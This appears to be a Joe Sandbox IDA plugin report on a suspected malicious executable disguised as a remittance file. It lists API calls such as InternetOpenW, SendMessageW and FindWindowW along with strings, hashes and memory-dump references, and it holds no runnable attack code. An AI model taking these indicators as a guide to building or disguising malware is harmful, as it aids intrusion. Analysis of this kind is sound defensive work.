                                                                      • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                      • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                      • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: \
                                                                      • API String ID: 4104443479-2967466578
                                                                      • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                      • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                      • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                      • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00466825
                                                                      • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CrackInternet_wcslen
                                                                      • String ID: |
                                                                      • API String ID: 596671847-2343686810
                                                                      • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                      • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                      • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                      • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: '
                                                                      • API String ID: 3850602802-1997036262
                                                                      • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                      • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                      • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                      • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                      APIs
                                                                      • _strlen.LIBCMT ref: 0040F858
                                                                        • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                        • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                      • _sprintf.LIBCMT ref: 0040F9AE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$_sprintf_strlen
                                                                      • String ID: %02X
                                                                      • API String ID: 1921645428-436463671
                                                                      • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                      • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                      • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                      • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: Combobox
                                                                      • API String ID: 3850602802-2096851135
                                                                      • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                      • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                      • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                      • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                      APIs
                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: LengthMessageSendTextWindow
                                                                      • String ID: edit
                                                                      • API String ID: 2978978980-2167791130
                                                                      • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                      • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                      • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                      • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                      APIs
                                                                      • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                      • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemorySleepStatus
                                                                      • String ID: @
                                                                      • API String ID: 2783356886-2766056989
                                                                      • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                      • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                      • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                      • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: htonsinet_addr
                                                                      • String ID: 255.255.255.255
                                                                      • API String ID: 3832099526-2422070025
                                                                      • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                      • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                      • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                      • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                      APIs
                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: InternetOpen
                                                                      • String ID: <local>
                                                                      • API String ID: 2038078732-4266983199
                                                                      • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                      • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                      • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                      • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __fread_nolock_memmove
                                                                      • String ID: EA06
                                                                      • API String ID: 1988441806-3962188686
                                                                      • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                      • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                                      • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                      • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: u,D
                                                                      • API String ID: 4104443479-3858472334
                                                                      • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                      • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                                      • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                      • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • wsprintfW.USER32 ref: 0045612A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend_mallocwsprintf
                                                                      • String ID: %d/%02d/%02d
                                                                      • API String ID: 1262938277-328681919
                                                                      • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                      • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                      • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                      • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                      APIs
                                                                      • InternetCloseHandle.WININET(?), ref: 00442663
                                                                      • InternetCloseHandle.WININET ref: 00442668
                                                                        • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleInternet$ObjectSingleWait
                                                                      • String ID: aeB
                                                                      • API String ID: 857135153-906807131
                                                                      • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                      • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                      • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                      • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                      APIs
                                                                      Strings
                                                                      • C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe, xrefs: 0043324B
                                                                      • ^B, xrefs: 00433248
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsncpy
                                                                      • String ID: ^B$C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe
                                                                      • API String ID: 1735881322-2477654652
                                                                      • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                                      • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                                                      • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                                      • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                                                      APIs
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                      • PostMessageW.USER32(00000000), ref: 00441C05
                                                                        • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: FindMessagePostSleepWindow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 529655941-2988720461
                                                                      • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                      • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                      • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                      • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                      APIs
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                        • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
